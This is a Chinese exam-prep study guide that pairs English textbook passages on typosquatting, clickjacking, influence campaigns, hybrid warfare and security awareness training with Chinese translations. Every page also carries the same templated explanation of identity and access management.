这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

程序:程序是一步一步怎么做。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

身份:身份是主体在系统中的标识。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 209 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

网络题先定位层次,再判断协议、设备或攻击位置。

身份管理题要区分识别、认证、授权、审计。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
程序 程序是一步一步怎么做。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
身份 身份是主体在系统中的标识。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 71 / PDF P210

第 210 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

impersonation concepts were covered earlier in the “Impersonation and Masquerading” section. As a current or future victim of identity theft/fraud, you should take actions to reduce your vulnerability, increase the chance of detecting such attacks, and improve your defenses against this type of injustice. Typosquatting Typosquatting is a practice employed to capture and redirect traffic when a user mistypes the domain name or IP address of an intended resource. This is a social engineering attack that takes advantage of a person's potential to mistype a fully qualified domain name (FQDN) or address.

A malicious site squatter predicts URL typos and then registers those domain names to direct traffic to their own site. This can be done for competition or for malicious intent. The variations used for typosquatting include common misspellings (such as googel.com), typing errors (such as gooogle.com), variations on a name or word (for example, plurality, as in googles.com), and different toplevel domains (TLDs) (such as google.edu). URL hijacking can also refer to the practice of displaying a link or advertisement that looks like that of a well-known product, service, or site but, when clicked, redirects the user to an alternate location, service, or product.

This may be accomplished by posting sites and pages and exploiting search engine optimization (SEO) to cause your content to occur higher in search results, or through the use of adware that replaces legitimate ads and links with those leading to alternate or malicious locations. Clickjacking is a means to redirect a user's click or selection on a web page to an alternate, often malicious target instead of the intended and desired location. This can be accomplished through several techniques. Some alter the code of the original web page in order to include a script that will automatically replace the valid URL with an alternate URL at the moment the mouse click or selection occurs.

Another means is to add an invisible or hidden overlay, frame, or image map over the displayed page. The user sees the original page, but any mouse click or selection will be captured by the floating frame and redirected to the malicious target. Clickjacking can be used to perform phishing attacks, hijacking, and Adversary-in-the-Middle ([AitM], aka on-path, previously known as Man-in-the-Middle [MitM]) attacks. Influence Campaigns

中文直译 / 整理

冒充概念此前已在“冒充与伪装”部分中介绍过。 作为当前或未来的身份盗窃/欺诈受害者,您应采取措施降低自身脆弱性,提 高发现此类攻击的可能性,并加强针对这种不公正行为的防御能力。 拼写错误域注册 拼写错误域注册是一种在用户误输入目标资源的域名或IP地址时,用于捕获并 重定向流量的做法。 这是一种社会工程攻击,利用了人们可能误输入完整合格 域名(FQDN)或地址的倾向。 恶意域名注册者会预测URL的拼写错误,然后 注册这些域名,将流量导向自己的网站。 这种行为可能出于竞争目的或恶意意 图。 拼写错误域注册使用的变体包括常见拼写错误(例如googel.com)、输入 错误(例如gooogle.com)、名称或词语的变体(例如复数形式,如 googles.com),以及不同的顶级域名(TLD)(例如google.edu)。 URL劫持也可指显示一个看似知名产品、服务或网站的链接或广告,但点 击后会将用户重定向到其他位置、服务或产品。 这可以通过发布网站和页面, 并利用搜索引擎优化(SEO)使您的内容在搜索结果中排名更高来实现,或通 过使用广告软件替换合法广告和链接,将其替换为指向其他或恶意位置的链接。

点击劫持是一种将用户在网页上的点击或选择重定向到替代目标(通常是恶意 目标)而非预期目标的技术。 这可以通过多种方法实现。 一些方法会修改原始 网页的代码,以插入一个脚本,在鼠标点击或选择发生的瞬间自动将有效 URL替换为替代URL。 另一种方法是在显示的页面上添加一个不可见或隐藏的 覆盖层、框架或图像映射。 用户看到的是原始页面,但任何鼠标点击或选择都 会被浮动框架捕获并重定向到恶意目标。 点击劫持可用于执行钓鱼攻击、劫持 攻击和对手中间([AitM],,即中间人,以前称为中间人攻击 [MitM])攻击。 影响力活动

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 210 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
身份 身份是主体在系统中的标识。
学习单元 72 / PDF P211

第 211 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Influence campaigns are social engineering attacks that attempt to guide, adjust, or change public opinion. Although such attacks might be undertaken by attackers against individuals or organizations, most influence campaigns seem to be waged by nation-states against their real or perceived foreign enemies. Influence campaigns are linked to the distribution of false or misleading content, including: Disinformation. Intentionally false or misleading information spread with the purpose of deceiving or manipulating people. It is often used as a tool for political, ideological, or malicious agendas. Misinformation. Inaccurate or misleading information that is spread without malicious intent.

It can be the result of errors, misunderstandings, or the unintentional sharing of false information. Propaganda. A systematic effort to spread ideas, information, or opinions, often of a biased or misleading nature, to promote a particular cause, political viewpoint, or ideology. It aims to shape public perception and behavior. False information. Any information that is factually incorrect or inaccurate. It can be created or spread unintentionally or intentionally and may or may not have a specific agenda. “Fake news.” A term used to describe deliberately fabricated news stories or hoaxes presented as genuine journalism.

It often serves to misinform or deceive readers, and it may be politically motivated or created for profit. It can also be used to label genuine journalism as false. Doxing. Short for “document tracing” or “dropping documents.” Involves researching and publishing private or personally identifiable information about an individual, such as their real name, address, contact details, or other sensitive data, often with malicious intent, such as harassment or public shaming. Doxing can also refer to the release of false and fabricated information. Doxing can also be against organizations.

Misleading, incomplete, crafted, and altered information can be used as part of an influence campaign to adjust the perception of readers and viewers to the concepts, thoughts, and ideologies of the influencer. These tactics have been used by invaders for centuries to turn a population against their own government. In the current digital information age, influence campaigns are

中文直译 / 整理

影响活动是一种社会工程攻击,旨在引导、调整或改变公众舆论。 尽管此类攻 击可能由攻击者针对个人或组织实施,但大多数影响活动似乎是由国家针对其 真实或感知的外国敌人发动的。 影响活动与虚假或误导性内容的传播相关,包括: 虚假信息。 故意传播虚假或误导性信息,以欺骗或操纵他人。 它常被用作 政治、意识形态或恶意目的的工具。 误导性信息。 传播不准确或误导性信息,但无恶意意图。 它可能是由 于错误、误解或无意中分享虚假信息所致。 宣传。 有系统地传播思想、信息或观点,通常带有偏见或误导性,以促进 特定事业、政治立场或意识形态。 其目的在于塑造公众认知和行为。 虚假信息。 任何在事实上不正确或不准确的信息。 它可能被无意或有意 创建和传播,可能有特定议程,也可能没有。 “假新闻”。 一个用于描述故意捏造的新闻故事或骗局的术语,这些内 容被伪装成真实的新闻报道。 它常用于误导或欺骗读者,可能具有政治动 机或为牟利而制造。 它也可能被用来将真实的新闻报道标签为虚假。 人肉搜索。 是“文档追踪”或“泄露文档”的简称。

涉及 研究并发布关于个人的私人或可识别身份的信息,例如其真实姓名、地址、 联系方式或其他敏感数据,通常带有恶意目的,如骚扰或公开羞辱。 人肉 搜索也可能指发布虚假和捏造的信息。 人肉搜索也可能针对组织。 误导性、不完整、人为编造和篡改的信息可被用作影响运动的一部分,以调 整读者和观众对影响者所倡导的概念、思想和意识形态的认知。 这些策略数 百年来一直被入侵者用来煽动民众反对自己的政府。 在当前的数字信息时代, 影响运动是

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

身份:身份是主体在系统中的标识。

日志:日志记录系统和用户活动,用于监控、审计和调查。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 211 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

身份管理题要区分识别、认证、授权、审计。

日志要保护完整性、时间同步和访问控制。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 73 / PDF P212

第 212 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

easier to wage than ever before and some of the perpetrators are domestic. Modern influence campaigns don't need to rely on the distribution of printed materials but can digitally transmit the propaganda directly to the targets. Hybrid Warfare Nations no longer limit their attacks against their real or perceived enemies using traditional, kinetic weaponry. Now they combine classical military strategy with modern capabilities, including social engineering, digital influence campaigns, psychological warfare efforts, political tactics, and cyberwarfare capabilities. This is known as hybrid warfare. Some entities use the term nonlinear warfare or irregular warfare to refer to this concept.

It is important to realize that nations will use whatever tools or weapons are available to them when they feel threatened or decide they must strike first. With the use of hybrid warfare tactics, there is far greater risk to every individual than in battles of the past. Now with cyberwar and influence campaigns, every person can be targeted and potentially harmed. Keep in mind that harm is not just physical in hybrid warfare; it can also damage reputation, finances, digital infrastructure, and relationships. For a more thorough look at hybrid warfare, read the U.S. Government Accountability Office's “Hybrid Warfare” report.

“Cyberwarfare: Origins, Motivations and What You Can Do in Response” is a helpful paper you can find at www.globalknowledge.com/us-en/resources/resource-library/whitepapers/cyberwarfare-origins-motivations-and-what-you-can-do-inresponse. Social Media Social media has become a weapon in the hands of nation-states as they wage elements of hybrid warfare against their targets. In the last decade, we have seen evidence of several nations, including our own, participating in social media–based influence campaigns. You should realize that you cannot just assume that the content you see on a social network is accurate, valid, or complete.

Even when quoted by your friends, when referenced in popular media, when seemingly in line with your own expectations, you have to be

中文直译 / 整理

比以往任何时候都更容易开展,且一些实施者来自国内。 现代影响运动无需依 赖印刷材料的分发,而是可以直接通过数字方式将宣传内容传递给目标受众。 混合战争 国家不再仅限于使用传统动能武器攻击其真实或感知到的敌人。 如今,它们将 经典军事战略与现代能力相结合,包括社会工程、数字影响运动、心理战、政 治策略和网络战能力。 这被称为混合战争。 一些实体使用非线性战争或非正规 战争来指代这一概念。 重要的是要认识到,当国家感到受到威胁或决定必须先发制人时,它们会使用 任何可用的工具或武器。 借助混合战争战术,每个人所面临的风险远大于过去 的战斗。 如今,通过网络战和影响运动,每个人都有可能成为目标并受到伤害。 请记住,在混合战争中,伤害不仅限于肉体层面; 它还可能损害声誉、财务、 数字基础设施和人际关系。 要更全面地了解混合战争,请阅读美国政府问责办公室的《混合战争》报告。

《网络战:起源、动机及应对措施》是一篇您可以在以下网址找到的有 用论文: www.globalknowledge.com/us-en/resources/resource-library/whitepapers/cyberwarfare-origins-motivations-and-what-you-can-do-inresponse. 社交媒体 社交媒体已成为国家在对目标实施混合战争元素时手中的武器。 在过去十年中, 我们已看到包括我们自己在内的多个国家参与了基于社交媒体的影响力运动。 您必须意识到,不能仅仅假设您在社交网络上看到的内容是准确、有效或完整 的。 即使您的朋友引用了它,即使主流媒体进行了报道,即使它似乎与您的预 期一致,您也必须

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

问责性:问责性要求能把行为绑定到具体主体。

入侵防御系统 IPS:IPS 可检测并主动阻断恶意流量。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 212 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

问责依赖识别、认证、授权、审计和记账共同工作。

IPS 放在线路中,误报可能影响可用性。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
问责性 问责性要求能把行为绑定到具体主体。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 74 / PDF P213

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

skeptical of everything that reaches you through your digital communication devices. The use and abuse of social media by adversaries, foreign and domestic, brings the social engineering attack concept to a whole new level. A great resource for learning how not to fall for false information distributed through the Internet is the “Navigating Digital Information” series presented by the YouTube channel CrashCourse: www.youtube.com/playlist?list=PL8dPuuaLjXtN07XYqqWSKpPrtNDiCHTzU. Workers can easily waste time and system resources by interacting with social media when that task is not part of their job description.

The company's acceptable user policy (AUP) should indicate that workers need to focus on work while at work rather than spending time on personal or nonwork-related tasks. Social media can be a means by which workers intentionally or accidentally distribute internal, confidential, proprietary, or PII data to outsiders. This may be accomplished by typing in messages or participating in chats in which they reveal confidential information. This can also be accomplished by distributing or publishing sensitive documents. Responses to social media issues can include blocking access to social media sites by adding IP blocks to firewalls and resolution filters to Domain Name System (DNS) queries.

Violating workers need to be reprimanded or even terminated. Establish and Maintain a Security Awareness, Education, and Training Program The successful implementation of a security solution requires changes in user behavior. These changes primarily consist of alterations in normal work activities to comply with the standards, guidelines, and procedures mandated by the security policy. Behavior modification involves some level of learning on the part of the user. To develop and manage security education, training, and awareness, all relevant items of knowledge transference must be clearly identified and programs of presentation, exposure, synergy, and implementation crafted. Awareness

中文直译 / 整理

对通过您的数字通信设备传达到您的所有信息保持怀疑态度。 对手——无论是外国还是 国内——对社交媒体的使用和滥用,将社会工程攻击的概念提升到了一个全新的水平。 学习如何避免受互联网上散布的虚假信息误导的一个绝佳资源是 YouTube频道CrashCourse推出的“数字信息导航”系列: www.youtube.com/playlist?list=PL8dPuuaLjXtN07XYqqWSKpPrtNDiCHTzU. 员工在从事与工作职责无关的任务时,很容易通过访问社交媒体浪费时间和系 统资源。 公司的可接受用户政策(AUP)应明确指出,员工在工作期间应专注 于工作,而非花费时间于个人或与工作无关的任务。 社交媒体可能成为员工有意或无意将内部、机密、专有或个人身份信息(PII) 数据泄露给外部人员的渠道。 这可能通过在消息或聊天中透露机密信息来实现, 也可能通过分发或发布敏感文档来完成。 应对社交媒体问题的措施包括通过在 防火墙中添加IP封锁和在域名系统(DNS)查询中设置解析过滤器来阻止访问 社交媒体网站。 违反规定的员工应受到训诫,甚至被解雇。 建立并维护安全意识、教育和培训计划 安全解决方案的成功实施需要改变用户行为。

这些改变主要涉及对日常工作活 动的调整,以遵守安全政策所规定的标准、指南和程序。 行为改变涉及用户一 定程度的学习。 为开发和管理安全教育、培训和意识提升,必须明确识别所有 相关的知识传递要素,并设计相应的展示、接触、协同和实施计划。 意识

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

政策:政策是高层原则,说明必须遵守什么。

标准:标准给出必须满足的最低要求。

指南:指南是建议做法,不一定强制。

程序:程序是一步一步怎么做。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Policy 高层、强制、稳定;Procedure 具体步骤。

Minimum level、mandatory requirement 常对应 standard。

Recommended、not compulsory 常对应 guideline。

Step-by-step、SOP 常对应 procedure。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
政策 政策是高层原则,说明必须遵守什么。
标准 标准给出必须满足的最低要求。
指南 指南是建议做法,不一定强制。
程序 程序是一步一步怎么做。
防火墙 防火墙根据规则控制网络流量进出。
身份 身份是主体在系统中的标识。
学习单元 75 / PDF P214

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

A prerequisite to security training is awareness. The goal of creating awareness is to bring security to the forefront and make it a recognized entity for users. Awareness establishes a common baseline or foundation of security understanding across the entire organization and focuses on key or basic topics and issues related to security that all employees must understand. Awareness is not exclusively created through a classroom type of presentation but also through the work environment reminders such as posters, newsletter articles, and screen savers. Instructor-led awareness, training, and education provide the best opportunity for real-time feedback from attendees.

Awareness establishes a minimum standard common denominator or foundation of security understanding. All personnel should be fully aware of their security responsibilities and liabilities. They should be trained to know what to do and what not to do. The issues that users must be aware of include avoiding waste, fraud, and unauthorized activities. All members of an organization, from senior management to temporary interns, need the same level of awareness. The awareness program in an organization should be tied in with its security policy, incident-handling plan, business continuity, and disaster recovery procedures.

For an awareness-building program to be effective, it must be fresh, creative, and updated often. The awareness program should also be tied to an understanding of how the corporate culture will affect and impact security for individuals as well as the organization as a whole. If employees do not see enforcement of security policies and standards among the C-level executives, especially at the awareness level, then they may not feel obligated to abide by them either. Training Training is teaching employees to perform their work tasks and to comply with the security policy. Training is typically hosted by an organization and is targeted to groups of employees with similar job functions.

All new employees require some level of training so they will be able to comply with all standards, guidelines, and procedures mandated by the security policy. Training is an ongoing activity that must be sustained throughout the lifetime

中文直译 / 整理

安全培训的前提是意识。 建立意识的目标是将安全置于首要位置,使其成为用 户认可的实体。 意识在全组织内建立了一个共同的安全理解基础,聚焦于所有 员工必须理解的关键或基本安全主题和问题。 意识不仅通过课堂式演示来建立, 还通过工作环境中的提醒方式实现,例如海报、简报文章和屏幕保护程序。 由讲师主导的意识提升、培训和教育为参与者提供了实时反馈的最佳机 会。 意识建立了一个最低标准的共同基础或安全理解的基石。 所有人员都应充分了 解自身的安全责任和义务,并接受培训,知晓应做什么和不应做什么。 用户必须了解的问题包括避免浪费、欺诈和未经授权的活动。 组织中的所有成 员,从高层管理人员到临时实习生,都需要同等水平的意识。 组织的意识计划 应与其安全政策、事件处理计划、业务连续性和灾难恢复程序相衔接。 要使意 识提升计划有效,它必须保持新颖、富有创意并经常更新。 意识计划还应与对 企业文化如何影响个人及整个组织安全的理解相结合。 如果员工看不到高级管 理层(尤其是C级高管)对安全政策和标准的执行,那么他们也可能不会感到有 义务遵守这些政策。 训练 培训是教导员工执行其工作任务并遵守安全政策。

培训通常由组织举办,针对 具有类似工作职能的员工群体。 所有新员工都需要接受一定程度的培训,以便 能够遵守安全政策所规定的各项标准、指南和程序。 培训是一项持续性的活动, 必须贯穿每位员工的整个任职期间

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

政策:政策是高层原则,说明必须遵守什么。

标准:标准给出必须满足的最低要求。

指南:指南是建议做法,不一定强制。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

Policy 高层、强制、稳定;Procedure 具体步骤。

Minimum level、mandatory requirement 常对应 standard。

Recommended、not compulsory 常对应 guideline。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
政策 政策是高层原则,说明必须遵守什么。
标准 标准给出必须满足的最低要求。
指南 指南是建议做法,不一定强制。
程序 程序是一步一步怎么做。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 76 / PDF P215

第三方治理:外包不外包责任

供应商也要被合同、审计、评估和持续监控管理起来。

教材原文段落

of the organization for every employee. It is considered an administrative security control. Methods and techniques to present awareness and training should be revised and improved over time to maximize benefits. This will require that training metrics be collected and evaluated. Improved awareness and training programs may include post-learning testing as well as monitoring for job consistency improvements and reductions in downtime, security incidents, or mistakes. This can be considered a program effectiveness evaluation. Awareness and training are often provided in-house. That means these teaching tools are created and deployed by and within the organization itself.

However, the next level of knowledge distribution is usually obtained from an external third-party source. Education Education is a detailed endeavor in which students and users learn much more than they actually need to know to perform their work tasks. Education is most often associated with users pursuing certification or seeking job promotion. It is typically a requirement for personnel seeking security professional positions. A security professional needs extensive knowledge of security and the local environment for the entire organization and not just for their specific work tasks.

A new development in the security education arena is microtraining (aka micro-learning, micro-education, or fast learning). Microtraining is a training and learning approach that involves delivering short, focused, and bite-sized learning modules or content to learners. These brief learning units are typically designed to be highly specific, addressing a single learning objective or a small set of related objectives in a concise and easily digestible format. Micro-training is characterized by its brevity and effectiveness in conveying information, making it well suited for the fast-paced and attention-challenged digital age. Often, micro-training is delivered via mobile apps.

Improvements The following are techniques for improving security awareness and training: 。

中文直译 / 整理

它被视为一种行政性安全控制措施。 呈现意识和培训的方法与技术应随着时间推移进行修订和改进,以最大化效益。 这需要收集和评估培训指标。 改进的意识和培训计划可能包括学习后的测试, 以及对工作一致性改进、停机时间减少、安全事件或错误减少的监控。 这可视 为对项目有效性的评估。 意识和培训通常由内部提供。 这意味着这些教学工具由组织自身创建和部署。 然而,更高层次的知识传播通常来自外部第三方来源。 教育 教育是一项细致的工作,学生和用户从中学习的内容远超其执行工作任务所需 的知识。 教育通常与用户追求认证或寻求职位晋升相关联。 它通常是寻求安全 专业岗位人员的必要要求。 安全专业人员需要全面了解整个组织的安全性及本 地环境,而不仅仅局限于其特定的工作任务。 安全教育领域的一项新发展是微培训(又称微学习、微教育或快速学 习)。 微培训是一种培训与学习方法,通过向学习者提供简短、专注且碎 片化的学习模块或内容来实现。 这些简短的学习单元通常设计得高度具体, 旨在以简洁易懂的形式解决单一学习目标或一组相关的小目标。 微培训以 其简短性和高效传递信息的特点著称,非常适合快节奏且注意力分散的数 字时代。 微培训通常通过移动应用程序交付。

改进 以下是提高安全意识和培训的技巧:

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:供应商也要被合同、审计、评估和持续监控管理起来。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

NIST:NIST 提供美国常用安全标准、框架和指南。

程序:程序是一步一步怎么做。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第三方治理:外包不外包责任”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

网络题先定位层次,再判断协议、设备或攻击位置。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
学习单元 77 / PDF P216

第 216 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Change the target focus of the training. Sometimes you want to focus on the individual, sometimes on customers and clients, and other times on the organization. Change around topic orders or emphasis; maybe focus on social engineering during one training, then next time focus on mobile device security, and then family and travel security after that.

Use a variety of presentation methods, such as in-person instruction, prerecorded videos, computer software/simulations, virtual reality (VR) experiences, off-site training, interactive websites, or assigned reading of either prepared courseware or off-the-shelf books (such as Scam Me If You Can: Simple Strategies to Outsmart Today's Rip-off Artists or The Art of the Con: How to Think Like a Real Hustler and Avoid Being Scammed, both by Frank Abagnale). Use role-playing by providing attendees with parts in a reenactment both as attacker and defender, but allow various people to offer ideas related to defending or responding to the attacks. Develop and encourage security champions.

These are people who take the lead in a project, such as development, leadership, or training, to enable, support, and encourage the adoption of security knowledge and practices through peer leadership, behavior demonstration, and social encouragement. Often a security champion is a member of a group who decides (or is assigned) to take charge of leading the adoption and integration of security concepts into the group's work activities. Security champions are often nonsecurity employees who take up the mantle to encourage others to support and adopt more security practices and behaviors.

Security champions are often found in software development, but this concept can be useful in any group of employees in any department. Security awareness and training can often be improved through gamification. Gamification is a means to encourage compliance and engagement by integrating common elements of gameplay into other activities, such as security compliance and behavior change. This can include rewarding compliance behaviors and potentially punishing violating behaviors.

Many aspects of gameplay (derived from card games, board games, sports, video games, and so on) can be integrated into security training and adoption, such as scoring points, earning achievements or badges, competing/cooperating with others, following a set of common/standard rules, having a defined goal, seeking rewards, developing group stories/experiences, and avoiding pitfalls

中文直译 / 整理

改变培训的目标重点。 有时您希望聚焦于个人,有时聚焦于客户和用户, 有时则聚焦于组织。 调整主题的顺序或重点; 例如,一次培训侧重社会工程学,下一次侧重 移动设备安全,再下一次侧重家庭和旅行安全。 使用多种讲解方式,例如现场教学、预先录制的视频、计算机软件/模 拟、虚拟现实(VR)体验、异地培训、交互式网站,或指定阅读已准备好 的课程材料或现成书籍(例如Scam Me IfYou Can: Simple Strategies to Outsmart Today's Rip-off Artists或TheArt of the Con: How to Think Like a Real Hustler and Avoid BeingScammed,作者均为Frank Abagnale)。 通过角色扮演,为参会者分配攻击者和防御者的角色进行重现,同时允许 不同的人提出有关防御或应对攻击的建议。 培养并鼓励安全倡导者。 这些人会在项目中担任领导角色,例如在开发、管理 或培训中,通过同伴领导、行为示范和社会激励,推动安全知识和实践的采用。 通常,安全倡导者是某个团队中决定(或被指派)负责引领安全概念融入团队 工作活动的成员。

